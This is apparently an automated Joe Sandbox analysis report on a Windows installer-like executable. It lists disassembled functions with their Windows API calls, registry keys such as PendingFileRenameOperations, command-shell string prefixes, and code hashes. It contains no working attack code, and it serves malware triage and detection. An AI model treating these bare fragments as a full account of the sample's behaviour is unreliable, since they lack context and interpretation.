                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                                • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                                • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID: "*G$"*G
                                                                                • API String ID: 2066263336-450946878
                                                                                • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                                • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                                  • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                  • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                  • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                  • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                • API String ID: 854858120-615399546
                                                                                • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                                • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: 2$MAINICON
                                                                                • API String ID: 3935243913-3181700818
                                                                                • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                                • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                  • Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                  • Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                  • Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                  • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                  • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                  • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                  • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                • API String ID: 1580766901-2767913252
                                                                                • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                                • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                                                • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                                Strings
                                                                                • PendingFileRenameOperations, xrefs: 00455740
                                                                                • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                                • WININIT.INI, xrefs: 004557D0
                                                                                • PendingFileRenameOperations2, xrefs: 00455770
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                • API String ID: 47109696-2199428270
                                                                                • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                                APIs
                                                                                • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                Similarity
                                                                                • API ID: Window$EnumLongWindows
                                                                                • String ID: lAB
                                                                                • API String ID: 4191631535-3476862382
                                                                                • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                                                • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                                                APIs
                                                                                • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                                Similarity
                                                                                • API ID: AddressDeleteHandleModuleProc
                                                                                • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                • API String ID: 588496660-1846899949
                                                                                • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                                                • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                                                Strings
                                                                                • Need to restart Windows? %s, xrefs: 0046C172
                                                                                • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                                • NextButtonClick, xrefs: 0046BF84
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                • API String ID: 0-2329492092
                                                                                • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                                • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                                APIs
                                                                                • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                                • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                                Similarity
                                                                                • API ID: ActiveChangeNotifyWindow
                                                                                • String ID: $Need to restart Windows? %s
                                                                                • API String ID: 1160245247-4200181552
                                                                                • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                                • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                                APIs
                                                                                  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                                • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                                • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                                Similarity
                                                                                • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                • String ID: Creating directory: %s
                                                                                • API String ID: 2451617938-483064649
                                                                                • Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                • Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
                                                                                • Opcode Fuzzy Hash: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
                                                                                • Instruction Fuzzy Hash: AE513F74A00248ABDB04DFA5D582BDEB7F5AF09304F50817BE850B7382D7786E08CB69
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E6E
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F34), ref: 00454ED8
                                                                                Similarity
                                                                                • API ID: AddressByteCharMultiProcWide
                                                                                • String ID: SfcIsFileProtected$sfc.dll
                                                                                • API String ID: 2508298434-591603554
                                                                                • Opcode ID: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                • Instruction ID: 1a17c74f1ac94ad93f17d87dc1e08c5ddb540f3824a5df31749c88666692504e
                                                                                • Opcode Fuzzy Hash: 6a91046d7309a4de6cfc4beec76e0de6ac9bbff88298f3f0baf31012854e5b94
                                                                                • Instruction Fuzzy Hash: 6A41A630A042189BEB10DB69DC85B9D77B8AB4430DF5081B7E908A7293D7785F88CF59
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B411
                                                                                • SelectObject.GDI32(?,00000000), ref: 0044B434
                                                                                • 73E9A480.USER32(00000000,?,0044B474,00000000,0044B46D,?,00000000,?,00000000,00000000,0044B49D,?,k H,?,?), ref: 0044B467
                                                                                Similarity
                                                                                • API ID: A480A570ObjectSelect
                                                                                • String ID: k H
                                                                                • API String ID: 1230475511-1447039187
                                                                                • Opcode ID: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                • Instruction ID: b5872ed9d16ca79c431bae9e7544c15e8f802733be01f045b529408bc148fe47
                                                                                • Opcode Fuzzy Hash: d4c138e2771e5465782f1838dde397b15c475f1a6013829dedf10027ea17c150
                                                                                • Instruction Fuzzy Hash: 6D217470A04248AFEB15DFA5C851B9EBBB9EB49304F51807AF504E7282D77CD940CB69
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B15C,?,k H,?,?), ref: 0044B12E
                                                                                • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B141
                                                                                • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B175
                                                                                Similarity
                                                                                • API ID: DrawText$ByteCharMultiWide
                                                                                • String ID: k H
                                                                                • API String ID: 65125430-1447039187
                                                                                • Opcode ID: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                • Instruction ID: 2dd5a1fcad8022b5ecdd36c3e8438632fadfe976456551c737a9f8dd3ea145e1
                                                                                • Opcode Fuzzy Hash: 9eee4d412d6110b2587a1d6710a95c773ea7c34e3a7d98a27860af6b4704048a
                                                                                • Instruction Fuzzy Hash: A3110BB6700604BFE700DB5A9C91D6F77ECD749750F10413BF504D72D0C6389E018668
APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
  • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
  • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
Strings
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 395431579-1506664499
• Opcode ID: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
• Instruction ID: a33720f3aac7210c00664dabe11b621525643aa7ae94b1405928deeb439ddd4e
• Opcode Fuzzy Hash: 0d90ae9549cb3a794f747e0b3b89476a1a48bf8a1e7f9d56d35495b62d60795c
• Instruction Fuzzy Hash: 1611A331B00318BBDB11EB62ED81B8E7BA8DB55704F90407BF400A6691DBB8AE05C65D
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(?,00455A67,?,00000001,00000000), ref: 00455A5A
Strings
• PendingFileRenameOperations2, xrefs: 00455A3B
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A08
• PendingFileRenameOperations, xrefs: 00455A2C
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
• Instruction ID: a84b10804161a04e9b7828e63518c67389a2277fb2d5ef6d9c2d81c30e1ce2e0
• Opcode Fuzzy Hash: a871c7690d9b103e0f7f2022bbb7230101daa82acd14c33f99511ba30d6e5aa6
• Instruction Fuzzy Hash: 49F09671714A04BFEB05D665DC72E3A739CD744B15FA1446BF800C6682DA7DBE04951C
APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?,00000000), ref: 0047F8AA
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?,?), ref: 0047F8B7
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D), ref: 0047F9AC
• FindClose.KERNEL32(000000FF,0047F9D7,0047F9D0,?,?,?,?,00000000,0047F9FD,?,00000000,00000000,?,?,00480C0D,?), ref: 0047F9CA
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
• Instruction ID: d4c1b09f85a1e3ce5f066f5119f691750f955bf6e0a6470712ab8dbd39f482a6
• Opcode Fuzzy Hash: dd47ce488d5ea13da555b7d1a4745cf9b199e366fd9c8806cfe2b69594f7a430
• Instruction Fuzzy Hash: 80513E71A00648AFCB10EF65CC45ADEB7B8AB88315F1085BAA818E7351D7389F49CF59
APIs
• GetMenu.USER32(00000000), ref: 00421371
• SetMenu.USER32(00000000,00000000), ref: 0042138E
• SetMenu.USER32(00000000,00000000), ref: 004213C3
• SetMenu.USER32(00000000,00000000), ref: 004213DF
Memory Dump Source
• Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
• Instruction ID: 7918b5ac66a49b7c70f092078a7f06842b1ce09055eaa5e04548cec6233339c2
• Opcode Fuzzy Hash: fcb1d01c21a3638414a8535da0e373d0dc57cc6d33ffad44a18b700e1522ce17
• Instruction Fuzzy Hash: 7D41A13070025447EB20EA79A9857AB26969F69318F4805BFFC44DF3A3CA7DDC45839D
APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B94
• SetTextColor.GDI32(?,00000000), ref: 00416BAE
• SetBkColor.GDI32(?,00000000), ref: 00416BC8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
Memory Dump Source
